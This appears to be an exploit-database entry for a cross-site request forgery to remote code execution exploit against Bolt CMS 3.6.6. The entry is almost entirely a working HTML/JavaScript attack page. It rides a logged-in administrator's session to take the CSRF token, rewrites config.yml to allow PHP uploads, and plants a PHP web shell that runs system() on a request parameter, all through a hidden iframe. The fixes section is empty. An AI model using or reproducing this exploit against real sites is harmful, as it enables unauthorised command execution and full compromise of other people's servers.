Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution

2019-04-08 15:05:12

<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function exploit() {

var target = "http://127.0.0.1"

var bolt_admin_url = target + "/bolt";

var xhr = new XMLHttpRequest();
xhr.open("POST", bolt_admin_url + "/upload", true);
xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------130713229751679908527494159");
xhr.withCredentials = true;
var body = "-----------------------------130713229751679908527494159\r\n" +
"Content-Disposition: form-data; name=\"files[]\"; filename=\"stager.html\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"\x3cscript\x3e\r\n" +
"\r\n" +
"function exploit(){\r\n" +
"\r\n" +
" var bolt_admin_url = \""+bolt_admin_url+"\";\r\n" +
"\r\n" +
" var xhr = new XMLHttpRequest();\r\n" +
" \r\n" +
" if(xhr) {\r\n" +
" xhr.open(\'GET\', bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" +
" xhr.onreadystatechange = handler;\r\n" +
" xhr.send();\r\n" +
" }\r\n" +
"\r\n" +
" function handler(){\r\n" +
" if (xhr.readyState == 4 && xhr.status == 200) {\r\n" +
" user_page = document.createElement(\'html\');\r\n" +
" user_page.innerHTML = xhr.responseText;\r\n" +
" token_input = (user_page.getElementsByTagName(\'input\')[0]).value;\r\n" +
" console.log(\"Token obtained:\" + token_input);\r\n" +
" ModifyAllowedExtensions(token_input);\r\n" +
" UploadShell();\r\n" +
" }\r\n" +
" }\r\n" +
"\r\n" +
" function ModifyAllowedExtensions(token) {\r\n" +
"\r\n" +
" var xhr = new XMLHttpRequest();\r\n" +
" xhr.open(\"POST\", bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" +
" xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" +
" xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" +
" xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\r\n" +
" xhr.withCredentials = true;\r\n" +
" var body = \"file_edit[_token]=\"+token+\"&file_edit[contents]=#+Database+setup.+The+driver+can+be+either+\\\'sqlite\\\',+\\\'mysql\\\'+or+\\\'postgres\\\'.
#
#+For+SQLite,+only+the+databasename+is+required.+However,+MySQL+and+PostgreSQL
#+also+require+\\\'username\\\',+\\\'password\\\',+and+optionally+\\\'host\\\'+(+and+\\\'port\\\'+)+if+the+database
#+server+is+not+on+the+same+host+as+the+web+server.
#
#+If+you\\\'re+trying+out+Bolt,+just+keep+it+set+to+SQLite+for+now.
database:
++++driver:+sqlite
++++databasename:+bolt

#+The+name+of+the+website
sitename:+A+sample+site
payoff:+The+amazing+payoff+goes+here

#+The+theme+to+use.
#
#+Don\\\'t+edit+the+provided+templates+directly,+because+they+_will_+get+updated
#+in+next+releases.+If+you+wish+to+modify+a+default+theme,+copy+its+folder,+and
#+change+the+name+here+accordingly.
theme:+base-2018

#+The+locale+that\\\'ll+be+used+by+the+application.+If+no+locale+is+set+the
#+fallback+locale+is+\\\'en_GB\\\'.+For+available+options,+see:
#+https://docs.bolt.cm/other/locales
#
#+In+some+cases+it+may+be+needed+to+specify+(non-standard)+variations+of+the
#+locale+to+get+everything+to+work+as+desired.
#
#+This+can+be+done+as+[nl_NL,+Dutch_Netherlands]+when+specifying+multiple
#+locales,+ensure+the+first+is+a+standard+locale.
locale:+en_GB

#+Set+the+timezone+to+be+used+on+the+website.+For+a+list+of+valid+timezone
#+settings,+see:+http://php.net/manual/en/timezones.php
#+timezone:+UTC

#+Set+maintenance+mode+on+or+off.
#
#+While+in+maintenance+mode,+only+users+of+level+editor+or+higher+can+access+the
#+site.
#
#+All+other+visitors+are+presented+with+a+notice+that+the+site+is+currently
#+offline.
#
#+The+default+template+file+can+be+found+in+/app/theme_defaults/+and+overridden
#+with+this+option+using+your+own+theme.
#
#+Note:+If+you\\\'ve+changed+the+filename,+and+your+changes+do+not+show+up+on+the
#+++++++website,+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.
#+++++++If+a+template+is+set+there,+it+will+override+the+setting+here.
maintenance_mode:+false
maintenance_template:+maintenance_default.twig

#+The+hour+of+the+day+for+the+internal+cron+task+scheduler+to+run+daily,+weekly,
#+monthly+and+yearly+jobs.
#
#+Default:+3+(3+am)
cron_hour:+3

#+If+your+site+is+reachable+under+different+urls+(say,+both+blog.example.org/
#+as+well+as+example.org/),+it\\\'s+a+good+idea+to+set+one+of+these+as+the
#+canonical,+so+it\\\'s+clear+which+is+the+primary+address+of+the+site.
#
#+If+you+include+`https://`,+it+will+be+included+in+the+canonical+urls.
#canonical:+example.org

#+Bolt+can+insert+a+<link+rel="shortcut+icon">+for+all+pages+on+the+site.

#+Note:+The+location+given+is+relative+to+the+currently+selected+theme.+If
#+++++++you+want+to+set+the+icon+yourself,+just+don\\\'t+enable+the+following+line.
#favicon:+images/favicon-bolt.ico

#+The+default+content+to+use+for+the+homepage,+and+the+template+to+render+it
#+with.+This+can+either+be+a+specific+record+(like+`page/1`)+or+a+listing+of
#+records+(like+`entries`).+In+the+chosen+\\\'homepage_template\\\',+you+will+have
#+`record`+or+`records`+at+your+disposal,+depending+on+the+\\\'homepage\\\'+setting.
#
#+Note:+If+you\\\'ve+changed+the+filename,+and+your+changes+do+not+show+up+on
#+++++++the+website,+be+sure+to+check+for+a+theme.yml+file+in+your+theme\\\'s
#+++++++folder.+If+a+template+is+set+there,+it+will+override+the+setting+here.
homepage:+homepage/1
homepage_template:+index.twig

#+The+default+content+for+the+404+page.+Can+be+an+(array+of)+template+names+or
#+identifiers+for+records,+which+will+be+tried+until+a+match+is+found.
#
#+Note:+The+record+specified+in+this+parameter+must+be+set+to+\\\'published\\\'.
notfound:+[+not-found.twig,+block/404-not-found+]

#+The+default+template+for+single+record+pages+on+the
#+site.
#
#+Can+be+overridden+for+each+contenttype+and+for+each+record,+if+it+has+a
#+\\\'templateselect\\\'+field.
#
#+Note:+If+you\\\'ve+changed+the+filename,+and+your+changes+do+not+show+up+on+the
#+++++++website,+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.
#+++++++If+a+template+is+set+there,+it+will+override+the+setting+here.
record_template:+record.twig

#+The+default+template+and+amount+of+records+to+use+for+listing-pages+on+the
#+site.
#
#+Can+be+overridden+for+each+contenttype.
#
#+Note+1:+Sorting+on+TAXONOMY-pages+will+give+unexpected+results,+if+it+has+a
#+++++++++pager.
#+++++++++If+you+need+sorting+on+those,+make+sure+you+display+all+the+records+on+one
#+++++++++page.
#
#+Note+2:+If+you\\\'ve+changed+the+filename,+and+your+changes+do+not+show+up+on+the
#+++++++++website,+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s
#+++++++++folder.+If+a+template+is+set+there,+it+will+override+the+setting+here.
listing_template:+listing.twig
listing_records:+6
listing_sort:+datepublish+DESC

#+Because+of+limitations+on+how+the+underlying+database+queries+work,+there+are
#+only+two+options+for+sorting+on+taxonomies.+\\\'ASC\\\'+for+roughly+"oldest+first"
#+and+\\\'DESC\\\'+for+roughly+\\\'newest+first\\\'.
taxonomy_sort:+DESC

#+Template+for+showing+the+search+results.+If+not+defined,+uses+the+settings+for
#+listing_template+and+listing_records.
#
#+Note:+If+you\\\'ve+changed+the+filename,+and+your+changes+do+not+show+up+on+the
#+++++++website,+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.
#+++++++If+a+template+is+set+there,+it+will+override+the+setting+here.
search_results_template:+search.twig
search_results_records:+10

#+Add+jQuery+to+the+rendered+HTML,+whether+or+not+it\\\'s+added+by+an+extension.
add_jquery:+false

#+The+default+amount+of+records+to+show+on+overview+pages.+Can+be+overridden
#+for+each+contenttype.
recordsperpage:+10

#+Settings+for+caching+in+parts+of+Bolt.
#+-+config:++++++++Caches+the+parsed+.yml+files+from+/app/config.+It\\\'s+updated
#++++++++++++++++++immediately+when+one+of+the+files+changes+on+disk.+There
#++++++++++++++++++should+be+no+good+reason+to+turn+this+off.
#
#+-+templates:+++++Caches+rendered+templates.
#
#+-+request:+++++++Caches+rendered+pages+in+the+configured+HTTP+reverse+proxy
#++++++++++++++++++cache,+on+GET+&+HEAD+requests.
#++++++++++++++++++By+default+this+is+handled+by+Syfmony+HTTP+Cache.
#
#+-+duration:++++++The+duration+(in+minutes)+for+the+\\\'templates\\\'+and+\\\'request\\\'
#++++++++++++++++++options.+default+is+10+minutes.+Note+that+the+duration+is+set
#++++++++++++++++++on+storing+the+cache.+By+lowering+this+value+you+will+not
#++++++++++++++++++invalidate+currently+cached+items.
#
#+-+authenticated:+Cache+\\\'templates\\\'+and+\\\'request\\\'+for+logged-on+users.+In+most
#++++++++++++++++++cases+you+should+*NOT*+enable+this,+because+it+will+cause
#++++++++++++++++++side-effects+if+the+website+shows+different+content+to
#++++++++++++++++++authenticated+users.
#
#+-+thumbnails:++++Caches+thumbnail+generation.
#
#+-+translations:++Caches+translation+files.+It+is+recommend+to+leave+this
#++++++++++++++++++enabled.+Only+if+you+develop+extensions+and+work+with
#++++++++++++++++++translation+files+you+should+turn+this+off.
caching:
++++config:+true
++++templates:+true
++++request:+false
++++duration:+10
++++authenticated:+false
++++thumbnails:+true
++++translations:+true

#+Set+\\\'enabled\\\'+to+\\\'true\\\'+to+log+all+content+changes+in+the+database.
#
#+Unless+you+need+to+rigorously+monitor+every+change+to+your+site\\\'s+content,+it
#+is+recommended+to+keep+this+disabled.
changelog:
++++enabled:+false

#+Default+settings+for+thumbnails.
#
#+Quality+should+be+between+0+(horrible,+small+file)+and+100+(best,+huge+file).
#
#+cropping:+++++++++++One+of+either+crop,+fit,+borders,+resize.
#+default_thumbnail:++The+default+size+of+images,+when+using
#+++++++++++++++++++++{{+record.image|thumbnail()+}}
#+default_image:++++++The+default+size+of+images,+when+using
#+++++++++++++++++++++{{+record.image|image()+}}
#+allow_upscale:++++++Determines+whether+small+images+will+be+enlarged+to+fit
#+++++++++++++++++++++the+requested+dimensions.
#+browser_cache_time:+Sets+the+amount+of+seconds+that+the+browser+will+cache
#+++++++++++++++++++++images+for.+Set+it+to+activate+browser+caching.
#
#+Note:+If+you+change+these+values,+you+might+need+to+clear+the+cache+before
#+++++++they+show+up.
thumbnails:
++++default_thumbnail:+[+160,+120+]
++++default_image:+[+1000,+750+]
++++quality:+80
++++cropping:+crop
++++notfound_image:+bolt_assets://img/default_notfound.png
++++error_image:+bolt_assets://img/default_error.png
++++save_files:+false
++++allow_upscale:+false
++++exif_orientation:+true
++++only_aliases:+false
#++++browser_cache_time:+2592000

#+Define+the+HTML+tags+and+attributes+that+are+allowed+in+\\\'cleaned\\\'+HTML.+This
#+is+used+for+sanitizing+HTML,+to+make+sure+there+are+no+undesirable+elements
#+left+in+the+content+that+is+shown+to+users.+For+example,+tags+like+`<script>`
#+or+`onclick`-attributes.
#+Note:+enabling+options+in+the+`wysiwyg`+settings+will+implicitly+add+items+to
#+the+allowed+tags.+For+example,+if+you+set+`images:+true`,+the+`<img>`+tag
#+will+be+allowed,+regardless+of+it+being+in+the+`allowed_tags`+setting.
htmlcleaner:
++++allowed_tags:+[+div,+span,+p,+br,+hr,+s,+u,+strong,+em,+i,+b,+li,+ul,+ol,+mark,+blockquote,+pre,+code,+tt,+h1,+h2,+h3,+h4,+h5,+h6,+dd,+dl,+dt,+table,+tbody,+thead,+tfoot,+th,+td,+tr,+a,+img,+address,+abbr,+iframe,+caption,+sub,+sup,+figure,+figcaption+]
++++allowed_attributes:+[+id,+class,+style,+name,+value,+href,+src,+alt,+title,+width,+height,+frameborder,+allowfullscreen,+scrolling,+target,+colspan,+rowspan+]

#+Uploaded+file+handling
#
#+You+can+change+the+pattern+match+and+replacement+on+uploaded+files+and+if+the
#+resulting+filename+should+be+transformed+to+lower+case.
#
#+Setting+\\\'autoconfirm:+true\\\'+prevents+the+creation+of+temporary+lock+files
#+while+uploading.
#
#+upload:
#+++++pattern:+\\\'[^A-Za-z0-9\.]+\\\'
#+++++replacement:+\\\'-\\\'
#+++++lowercase:+true
#+++++autoconfirm:+false

#+Define+the+file+types+(extensions+to+be+exact)+that+are+acceptable+for+upload
#+in+either+\\\'file\\\'+fields+or+through+the+\\\'files\\\'+screen.
accept_file_types:+[+php,+twig,+html,+js,+css,+scss,+gif,+jpg,+jpeg,+png,+ico,+zip,+tgz,+txt,+md,+doc,+docx,+pdf,+epub,+xls,+xlsx,+ppt,+pptx,+mp3,+ogg,+wav,+m4a,+mp4,+m4v,+ogv,+wmv,+avi,+webm,+svg]

#+Alternatively,+if+you+wish+to+limit+these,+uncomment+the+following+list
#+instead.+It+just+includes+file+types+/+extensions+that+are+harder+to+exploit.
#+accept_file_types:+[+gif,+jpg,+jpeg,+png,+txt,+md,+pdf,+epub,+mp3,+svg+]

#+If+you+want+to+\\\'brand\\\'+the+Bolt+backend+for+a+client,+you+can+change+some+key
#+variables+here,+that+determine+the+name+of+the+backend,+and+adds+a+primary
#+support/contact+link+to+the+footer.++Add+a+scheme,+like+`mailto:`+or
#+`https://`+to+the+email+or+URL.
#
#+Additionally+you+can+change+the+mount+point+for+the+backend,+either+for
#+convenience+or+to+obscure+it+from+prying+eyes.
#
#+The+Bolt+backend+is+accessible+as+`/bolt/`+by+default.+If+you+change+it+here,
#+it+will+only+be+accessible+through+the+value+set+in+\\\'path\\\'.
#+Keep+the+path+simple:+lowercase+only,+no+extra+slashes+or+other+special
#+characters.
#+branding:
#+++++name:+SuperCMS
#+++++path:+/admin
#+++++provided_by:+[[email protected],+"Supercool+Webdesign+Co."+]
#+++++news_source:+http://news.example.org
#+++++news_variable:+news

#+Show+the+\\\'debug\\\'+nut+in+the+lower+right+corner+for+logged-in+user.+By+default,
#+the+debugbar+is+only+shown+to+logged-in+users.+Use+the+\\\'debug_show_loggedoff\\\'
#+option+to+show+it+to+all+users.+You+probably+do+not+want+to+use+this+in+a
#+production+environment.
debug:+true
debug_show_loggedoff:+true
debug_permission_audit_mode:+false
debug_error_level:+8181+++++++++++#+equivalent+to+E_ALL+&~+E_NOTICE+&~+E_DEPRECATED+&~+E_USER_DEPRECATED+&~+E_WARNING
#+debug_error_level:+-1+++++++++++++++#+equivalent+to+E_ALL
debug_error_use_symfony:+false++++++#+When+set+to+true,+Symfony+Profiler+will+be+used+for+exception+display+when+possible
debug_trace_argument_limit:+4+++++++#+Determine+how+many+steps+in+the+backtrace+will+show+(dump)+arguments.

#+error+level+when+debug+is+disabled
production_error_level:+8181+#+=+E_ALL+&~+E_NOTICE+&~+E_WARNING+&~+E_DEPRECATED+&~+E_USER_DEPRECATED

#+System+debug+logging
#+This+will+enable+intensive+logging+of+Silex+functions+and+will+be+very+hard+on
#+performance+and+log+file+size.++++The+log+file+will+be+created+in+your+cache
#+directory.
#
#+Enable+this+for+short+time+periods+only+when+diagnosing+system+issues.
#+The+level+can+be+either:+DEBUG,+INFO,+NOTICE,+WARNING,+ERROR,+CRITICAL,+ALERT,+EMERGENCY
debuglog:
++++enabled:+false
++++filename:+bolt-debug.log
++++level:+DEBUG

#+Use+strict+variables.+This+will+make+Bolt+complain+if+you+use+{{+foo+}},
#+when+foo+doesn\\\'t+exist.
strict_variables:+false

#+There+are+several+options+for+giving+editors+more+options+to+insert+images,
#+video,+etc+in+the+WYSIWYG+areas.+But,+as+you+give+them+more+options,+that
#+means+they+also+have+more+ways+of+breaking+the+preciously+designed+layout.
#
#+By+default+the+most+\\\'dangerous\\\'+options+are+set+to+\\\'false\\\'.+If+you+choose+to
#+enable+them+for+your+editors,+please+instruct+them+thoroughly+on+their
#+responsibility+not+to+break+the+layout.
wysiwyg:
++++images:+false++++++++++++#+Allow+users+to+insert+images+in+the+content.
++++anchor:+false++++++++++++#+Adds+a+button+to+create+internal+anchors+to+link+to.
++++tables:+false++++++++++++#+Adds+a+button+to+insert+and+modify+tables+in+the+content.
++++fontcolor:+false+++++++++#+Allow+users+to+mess+around+with+font+coloring.
++++align:+false+++++++++++++#+Adds+buttons+for+\\\'align+left\\\',+\\\'align+right\\\',+etc.
++++subsuper:+false++++++++++#+Adds+buttons+for+subscript+and+superscript,+using+`<sub>`+and+`<sup>`.
++++embed:+false+++++++++++++#+Allows+the+user+to+insert+embedded+video\\\'s+from+Youtube,+Vimeo,+etc.
++++underline:+false+++++++++#+Adds+a+button+to+underline+text,+using+the+`<u>`-tag.
++++ruler:+false+++++++++++++#+Adds+a+button+to+add+a+horizontal+ruler,+using+the+`<hr>`-tag.
++++strike:+false++++++++++++#+Adds+a+button+to+add+stikethrough,+using+the+`<s>`-tag.
++++blockquote:+false++++++++#+Allows+the+user+to+insert+blockquotes+using+the+`<blockquote>`-tag.
++++codesnippet:+false+++++++#+Allows+the+user+to+insert+code+snippets+using+`<pre><code>`-tags.
++++specialchar:+false+++++++#+Adds+a+button+to+insert+special+chars+like+\\\'€\\\'+or+\\\'™\\\'.
++++clipboard:+false+++++++++#+Adds+buttons+to+\\\'undo\\\'+and+\\\'redo\\\'.
++++copypaste:+false+++++++++#+Adds+buttons+to+\\\'cut\\\',+\\\'copy\\\'+and+\\\'paste\\\'.
++++ck:
++++++++autoParagraph:+true++#+If+set+to+\\\'true\\\',+any+pasted+content+is+wrapped+in+`<p>`-tags+for+multiple+line-breaks
++++++++disableNativeSpellChecker:+true+#+If+set+to+\\\'true\\\'+it+will+stop+browsers+from+underlining+spelling+mistakes
++++++++allowNbsp:+false+++++#+If+set+to+\\\'false\\\',+the+editor+will+strip+out+`&nbsp;`+characters.+If+set+to+\\\'true\\\',+it+will+allow+them.+¯\_(ツ)_/¯

#+Bolt+uses+the+Google+maps+API+for+it\\\'s+geolocation+field+and+Google+now
#+requires+that+it+be+loaded+with+an+API+key+on+new+domains.+You+can+generate
#+a+key+at+https://developers.google.com/maps/documentation/javascript/get-api-key
#+and+enter+it+here+to+make+sure+that+the+geolocation+field+works.
#+google_api_key:

#+Global+option+to+enable/disable+the+live+editor
liveeditor:+false

#+Use+the+\\\'mailoptions\\\'+setting+to+configure+how+Bolt+sends+email:+using+\\\'smtp\\\'
#+or+PHP\\\'s+built-in+`mail()`-function.

#+Note+that+the+latter+might+_seem_+easier,+but+it\\\'s+been+disabled+by+a+lot+of
#+webhosts,+in+order+to+prevent+spam+from+wrongly+configured+scripts.+If+you+use
#+it,+your+mail+might+disappear+into+a+black+hole,+without+producing+any+errors.
#+Generally+speaking,+using+\\\'smtp\\\'+is+the+better+option,+so+use+that+if+possible.
#
#+Protip:+If+your+webhost+does+not+support+SMTP,+sign+up+for+a+(free)+Sparkpost
#+account+at+https://www.sparkpost.com/pricing/+for+sending+emails+reliably.
#
#+The+mail+defaults+use+bolt@yourhostname+with+the+site+title+as+a+default.
#+Override+this+with+the+senderName+and+senderMail+fields

#+mailoptions:
#+++++transport:+smtp
#+++++spool:+true
#+++++host:+localhost
#+++++port:+25
#+++++username:+username
#+++++password:+password
#+++++encryption:+null
#+++++auth_mode:+null
#+++++senderMail:+null
#+++++senderName:+null

#+mailoptions:
#+++++transport:+mail
#+++++spool:+false

#+Bolt+allows+some+modifications+to+how+\\\'strict\\\'+login+sessions+are.+For+every
#+option+that+is+set+to+true,+it+becomes+harder+for+a+bad-willing+person+to
#+spoof+your+login+session.+However,+it+also+requires+you+to+re-authenticate
#+more+often+if+you+change+location(ip-address)+or+your+browser+has+frequent
#+upgrades.+Only+change+these+if+you+know+what+you\\\'re+doing,+and+you\\\'re+having
#+issues+with+the+default+settings.
#
#+Note:+If+you+change+any+of+these,+all+current+users+will+automatically+be
#+++++++logged+off.
cookies_use_remoteaddr:+true
cookies_use_browseragent:+false
cookies_use_httphost:+true

#+The+length+of+time+a+user+stays+\\\'logged+in\\\'.+Change+to+0+to+end+the+session
#+when+the+browser+is+closed.
#
#+The+default+is+1209600+(two+weeks,+in+seconds).
cookies_lifetime:+1209600

#+Set+the+session+cookie+to+a+specific+domain.+Leave+blank,+unless+you+know+what
#+you\\\'re+doing.
#
#+When+set+incorrectly,+you+might+not+be+able+to+log+on+at+all.
#
#+If+you\\\'d+like+it+to+be+valid+for+all+subdomains+of+\\\'www.example.org\\\',+set+this
#+to+\\\'.example.org\\\'.
cookies_domain:

#+The+hash_strength+determines+the+amount+of+iterations+for+encrypting
#+passwords.
#
#+A+higher+number+means+a+harder+to+decrypt+password,+but+takes+longer+to
#+compute.+\\\'8\\\'+is+the+minimum,+\\\'10\\\'+is+the+default,+\\\'12\\\'+is+better.
hash_strength:+10

#+Bolt+sets+the+`X-Frame-Options`+and+`Frame-Options`+to+`SAMEORIGIN`+by
#+default,+to+prevent+the+web+browser+from+rendering+an+iframe+if+origin
#+mismatch+(i.e.+iframe+source+refers+to+a+different+domain).
#
#+Setting+this+to+\\\'false\\\',+will+prevent+the+setting+of+these+headers.
#+headers:
#+++++x_frame_options:+true

#+Bolt+uses+market.bolt.cm+to+fetch+it\\\'s+extensions+by+default.+You+can
#+change+that+URL+here.
#
#+Do+not+change+this,+unless+you+know+what+you\\\'re+doing,+and+understand+the
#+associated+risks.+If+you+use+\\\'http://market.bolt.cm\\\',+Bolt+will+not+use
#+SSL,+increasing+the+risk+for+a+MITM+attacks.
#+extensions:
#+++++site:+\\\'https://market.bolt.cm/\\\'
#+++++enabled:+true
#+++++composer:
#+++++++++minimum-stability:+stable++++++#+Either+\\\'stable\\\',+\\\'beta\\\',+or+\\\'dev\\\'.+Setting+\\\'dev\\\'+will+allow+you+to+install+dev-master+versions+of+extensions.
#+++++++++prefer-stable:+true++++++++++++#+Prefer+stable+releases+over+development+ones
#+++++++++prefer-dist:+true++++++++++++++#+Forces+installation+from+package+dist+even+for+dev+versions.
#+++++++++prefer-source:+false+++++++++++#+Forces+installation+from+package+sources+when+possible,+including+VCS+information.
#+++++++++config:
#+++++++++++++optimize-autoloader:+false+++++#+Optimize+autoloader+during+autoloader+dump.
#+++++++++++++classmap-authoritative:+false++#+Autoload+classes+from+the+classmap+only.+Implicitly+enables+`optimize-autoloader`.

#+Enforcing+the+use+of+SSL.+If+set,+all+pages+will+enforce+an+SSL+connection,
#+and+redirect+to+HTTPS+if+you+attempt+to+visit+plain+HTTP+pages.
#+enforce_ssl:+true

#+If+configured,+Bolt+will+trust+X-Forwarded-XXX+headers+from+the+listed+IP
#+addresses+and+ranges+when+determining+whether+the+current+request+is
#+\\\'secure\\\'.
#
#+This+is+required+to+correctly+determine+the+current+hostname+and+protocol
#+(HTTP+vs.+HTTPS)+when+running+behind+some+proxy,+e.g.+a+load+balancer,+cache,
#+or+SSL+proxy.
#
#+List+the+IP+addresses+or+subnets+that+you+know+are+such+proxies.
#
#+Note:+Allowing+hosts+here+that+may+not+be+trusted+proxies+is+a+security+risk.
#+++++++If+you+do+not+understand+what+this+does,+it+is+probably+best+to+not
#+++++++touch+it.
#+trustProxies:
#+++++-+127.0.0.1
#+++++-+10.0.0.0/8

#+If+you+want+Bolt+installation+get+news+through+a+proxy
#+httpProxy:
#+++++host:+scheme://my.proxy.server:port
#+++++user:+[usr]
#+++++password:+[pwd]

#+Options+for+backend+user+interface
#+backend:
#++++news:
#++++++++disable:+true+++++#+Disable+news+panel.+Defaults+to+false.+"Alerts"+will+still+be+shown.
#++++stack:
#++++++++disable:+true+++++#+Disable+stack+usage.+Defaults+to+false.

#+Options+that+will+be+forced+in+next+major+version
compatibility:
++++#+Whether+to+return+TemplateView+instead+of+TemplateResponse+from+Controller\Base::render()
++++#+Response+methods+cannot+be+used+on+TemplateView+objects.
++++#+Setting+this+value+to+false+is+deprecated.
++++template_view:+true
++++#+Set+to+\\\'false\\\'+to+enable+using+a+newer+version+of+the+setcontent+parser.
++++setcontent_legacy:+true
&file_edit[save]=undefined\\n\";\r\n" +
" var aBody = new Uint8Array(body.length);\r\n" +
" for (var i = 0; i \x3c aBody.length; i++)\r\n" +
" aBody[i] = body.charCodeAt(i); \r\n" +
" xhr.send(new Blob([aBody]));\r\n" +
" }\r\n" +
"\r\n" +
" function UploadShell() {\r\n" +
" var xhr = new XMLHttpRequest();\r\n" +
" xhr.open(\"POST\", bolt_admin_url + \"/upload\", true);\r\n" +
" xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" +
" xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" +
" xhr.setRequestHeader(\"Content-Type\", \"multipart\\/form-data; boundary=---------------------------130713229751679908527494159\");\r\n" +
" xhr.withCredentials = true;\r\n" +
" var body = \"-----------------------------130713229751679908527494159\\r\\n\" + \r\n" +
" \"Content-Disposition: form-data; name=\\\"files[]\\\"; filename=\\\"shell.php\\\"\\r\\n\" + \r\n" +
" \"Content-Type: text/plain\\r\\n\" + \r\n" +
" \"\\r\\n\" + \r\n" +
" \"\\x3c?php echo(system($_GET[\\\'cmd\\\'])); ?\\x3e\\n\" + \r\n" +
" \"\\r\\n\" + \r\n" +
" \"-----------------------------130713229751679908527494159--\\r\\n\";\r\n" +
" var aBody = new Uint8Array(body.length);\r\n" +
" for (var i = 0; i \x3c aBody.length; i++)\r\n" +
" aBody[i] = body.charCodeAt(i); \r\n" +
" xhr.send(new Blob([aBody]));\r\n" +
" }\r\n" +
" }\r\n" +
"\r\n" +
" exploit();\r\n" +
"\r\n" +
"\x3c/script\x3e\r\n" +
"\n" +
"\r\n" +
"-----------------------------130713229751679908527494159--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));

setTimeout(function() {
var dateObj = new Date();
var folder = dateObj.getFullYear() + "-" + (String("00"+(dateObj.getMonth()+1)).slice(-2));
document.getElementById('stager').src = target + "/files/"+folder+"/stager.html";
console.log("Called stager! Wait a moment and access: " + target + "/files/" + folder + "/shell.php?cmd=whoami");
}, 2000);

}

window.onload = function() {
exploit();
};

</script>
<iframe id="stager" style="width:0;height:0;border:0;border:none" src=""></iframe>
</body>
</html>

Fixes

No fixes

In order to submit a new fix you need to be registered.